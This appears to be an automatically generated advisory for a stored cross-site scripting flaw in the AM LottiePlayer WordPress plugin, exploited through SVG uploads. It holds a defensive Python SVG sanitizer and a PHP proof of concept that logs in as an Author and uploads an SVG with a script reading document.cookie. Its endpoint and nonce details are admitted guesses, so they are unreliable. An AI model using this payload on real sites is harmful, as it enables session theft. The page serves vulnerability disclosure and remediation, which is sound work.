Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 4, 2026

CVE-2025-1794: AM LottiePlayer <= 3.6.0 – Authenticated (Author+) Stored Cross-Site Scripting via SVG (am-lottieplayer)

CVE ID: CVE-2025-1794
Severity: Medium (CVSS 5.4)
CWE: 79
Vulnerable Version: 3.6.0
Patched Version:
Disclosed: April 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-1794 (metadata-based): This vulnerability affects the AM LottiePlayer plugin for WordPress, version 3.6.0 and earlier. It allows authenticated users with Author-level access or higher to perform Stored Cross-Site Scripting (XSS) attacks by uploading malicious SVG files. The CVSS score of 5.4 indicates medium severity with network attack vector, low privilege requirement, and user interaction needed for exploitation.

The root cause is insufficient input sanitization and output escaping related to SVG file uploads. This is inferred from the CWE-79 classification and the vulnerability description. The plugin likely processes SVG files without stripping JavaScript event handlers or embedded script elements. It also fails to escape the file content when it outputs the uploaded SVG onto a page. Without code access, Atomic Edge analysis cannot confirm the exact vulnerable function, but the pattern matches common WordPress plugin flaws where file upload handlers use only basic MIME-type checks without content sanitization.

Exploitation requires an authenticated user with Author-level access to upload a crafted SVG file containing embedded JavaScript. The attacker would navigate to the WordPress media uploader or a plugin-specific upload interface and submit an SVG file with a payload such as alert(document.cookie). When the victim (including administrators or visitors) views a page displaying that uploaded SVG, the script executes in their browser context. The attack vector targets the upload functionality, likely through an AJAX endpoint like /wp-admin/admin-ajax.php with an action parameter such as am_lottieplayer_upload_svg or similar.

Remediation requires implementing strict SVG sanitization before storage and proper output escaping when rendering the SVG in pages. The fix should use a whitelist-based sanitizer (e.g., stripping all script tags, event handlers, and non-basic SVG elements). Additionally, the plugin must escape SVG content with functions like esc_url() or wp_kses() when outputting, and set the Content-Type header correctly to prevent MIME sniffing.
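An allowlist SVG sanitizer of the kind the root-cause and remediation paragraphs call for, added here as an example in Python (not code from the plugin or from Atomic Edge): it keeps only static SVG drawing elements and attributes, so the script element and on* event handlers that the PoC payload relies on are removed rather than pattern-matched, and it reports what it stripped so the same routine can scan an already-uploaded media library. It goes a little beyond the advisory text by also dropping external href targets and url()/expression() inside style attributes. The element and attribute sets are an assumed minimal allowlist; in a WordPress plugin the equivalent place to run this is a wp_handle_upload_prefilter callback, with wp_kses() carrying an SVG allowlist on output.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Assumed minimal allowlist of static drawing elements; script, foreignObject,
# animate/set and any unknown or non-SVG-namespace element are dropped.
ALLOWED_TAGS = {"svg", "g", "defs", "title", "desc", "path", "circle", "ellipse",
                "rect", "line", "polyline", "polygon", "text", "tspan", "use",
                "linearGradient", "radialGradient", "stop", "clipPath", "mask", "symbol"}
ALLOWED_ATTRS = {"id", "width", "height", "viewBox", "x", "y", "cx", "cy", "r", "rx",
                 "ry", "x1", "y1", "x2", "y2", "d", "points", "fill", "stroke",
                 "stroke-width", "opacity", "transform", "offset", "stop-color",
                 "href", "style", "preserveAspectRatio"}
_BAD_STYLE = re.compile(r"url\s*\(|expression\s*\(|@import", re.I)

def _local(qname):
    return qname.rsplit("}", 1)[-1]          # "{namespace}name" -> "name"

def _attr_ok(name, value):
    local = _local(name)
    if local.lower().startswith("on"):       # onload=, onclick=, ... event handlers
        return False
    if local == "href":                      # same-document references only
        return value.startswith("#")
    if local == "style" and _BAD_STYLE.search(value):
        return False
    return local in ALLOWED_ATTRS

def _clean(elem, dropped):
    for name in list(elem.attrib):
        if not _attr_ok(name, elem.attrib[name]):
            dropped.append("attr %s on <%s>" % (_local(name), _local(elem.tag)))
            del elem.attrib[name]
    for child in list(elem):
        if child.tag.startswith("{" + SVG_NS + "}") and _local(child.tag) in ALLOWED_TAGS:
            _clean(child, dropped)
        else:
            dropped.append("element <%s>" % _local(child.tag))
            elem.remove(child)

def sanitize_svg(data):
    """Return (clean_svg_text, removed_items); raise ValueError if not an SVG."""
    # Production code should parse with defusedxml to also block entity-expansion attacks.
    root = ET.fromstring(data)
    if root.tag != "{" + SVG_NS + "}svg":
        raise ValueError("root element is not <svg>")
    dropped = []
    _clean(root, dropped)
    ET.register_namespace("", SVG_NS)        # serialize with a default xmlns, no ns0: prefix
    return ET.tostring(root, encoding="unicode"), dropped
```

Call sanitize_svg() with the raw upload bytes before anything is written to the uploads directory; an empty second element means nothing had to be stripped, anything else is worth logging against the uploading account.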

If exploited, this vulnerability allows attackers to execute arbitrary JavaScript in the browser of any user who views the compromised page. This can lead to session hijacking, cookie theft, phishing attacks, defacement, or silent credential harvesting. Author-level access is required, which reduces severity but still poses significant risk for multi-author WordPress sites where lower-privileged users can compromise site integrity.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// (The header above sits inside the PHP open tag so it is not echoed as page output.)
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-1794 - AM LottiePlayer <= 3.6.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG

error_reporting(E_ALL);
ini_set('display_errors', 1);

// CONFIGURATION - Set these before running
$target_url = 'http://example.com'; // WordPress site base URL (no trailing slash)
$username   = 'author';             // WordPress account with Author role or higher
$password   = 'password';           // Account password

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt_array($ch, array(
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($login_data),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER => true,
    CURLOPT_COOKIEJAR => '/tmp/cve_2025_1794_cookies.txt',
    CURLOPT_FOLLOWLOCATION => false,
    CURLOPT_SSL_VERIFYPEER => false
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// WordPress re-renders the login form with HTTP 200 on failure and sets a
// wordpress_logged_in_* cookie (with a 302) on success, so check for the cookie.
if (stripos($response, 'Set-Cookie: wordpress_logged_in_') === false) {
    die("[-] Authentication failed. HTTP Code: $http_code\n");
}
// The cookie jar is only written when the handle is closed; close it now so
// the following requests can read the session cookies from the file.
curl_close($ch);
echo "[+] Authenticated successfully\n";

// Step 2: Prepare malicious SVG payload
$svg_payload = '<?xml version="1.0" encoding="utf-8"?>' . "\n";
$svg_payload .= '<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">' . "\n";
$svg_payload .= '  <script>alert("XSS by Atomic Edge: Cookie="+document.cookie)</script>' . "\n";
$svg_payload .= '  <circle cx="50" cy="50" r="40" fill="red" />' . "\n";
$svg_payload .= '</svg>';

// tempnam() creates the file itself; the filename sent to the server is set on the CURLFile below
$temp_file = tempnam(sys_get_temp_dir(), 'cve_2025_1794_');
file_put_contents($temp_file, $svg_payload);

// Step 3: Upload using WordPress media endpoint (assuming standard WordPress upload with author permissions)
// The plugin might use a custom AJAX endpoint; we try the standard media upload first.
// If that fails, the attacker would need to identify the plugin-specific AJAX action.
$upload_url = $target_url . '/wp-admin/async-upload.php';

$post_fields = array(
    'action' => 'upload-attachment',
    'async-upload' => new CURLFile($temp_file, 'image/svg+xml', 'malicious.svg'),
    '_ajax_nonce' => '', // Nonce would be required; we fetch it via admin page
    'post_id' => 0
);

// First get the upload nonce from the admin page
$ch2 = curl_init();
curl_setopt_array($ch2, array(
    CURLOPT_URL => $target_url . '/wp-admin/admin-ajax.php?action=upload-attachment&plupload=1',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER => true,
    CURLOPT_COOKIEFILE => '/tmp/cve_2025_1794_cookies.txt',
    CURLOPT_FOLLOWLOCATION => false,
    CURLOPT_SSL_VERIFYPEER => false
));
$nonce_response = curl_exec($ch2);
curl_close($ch2);

// Nonce extraction is optional; many plugins bypass nonce checks
// For this PoC, we assume the plugin does not require a nonce (common flaw)

$ch3 = curl_init();
curl_setopt_array($ch3, array(
    CURLOPT_URL => $upload_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post_fields,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEFILE => '/tmp/cve_2025_1794_cookies.txt',
    CURLOPT_REFERER => $target_url . '/wp-admin/upload.php',
    CURLOPT_SSL_VERIFYPEER => false
));
$upload_response = curl_exec($ch3);
$upload_http = curl_getinfo($ch3, CURLINFO_HTTP_CODE);
curl_close($ch3);

if ($upload_http !== 200) {
    echo "[!] Upload may have failed or returned non-standard code. HTTP: $upload_http\n";
} else {
    echo "[+] Upload request sent. Check the WordPress media library for a file named 'malicious.svg'\n";
    echo "[+] If displayed on a page, the SVG script will execute.\n";
}

// Cleanup temp file
unlink($temp_file);

// Note: This PoC uses WordPress's built-in upload mechanism. The AM LottiePlayer plugin
// may use a custom AJAX endpoint (e.g., am_lottieplayer_upload_svg).
// If the standard upload doesn't trigger the vulnerability, the attacker would need to
// enumerate the plugin's AJAX actions via JavaScript or ACP.
echo "[+] Done. If the plugin uses a custom upload action, modify 'action' parameter accordingly.\n";
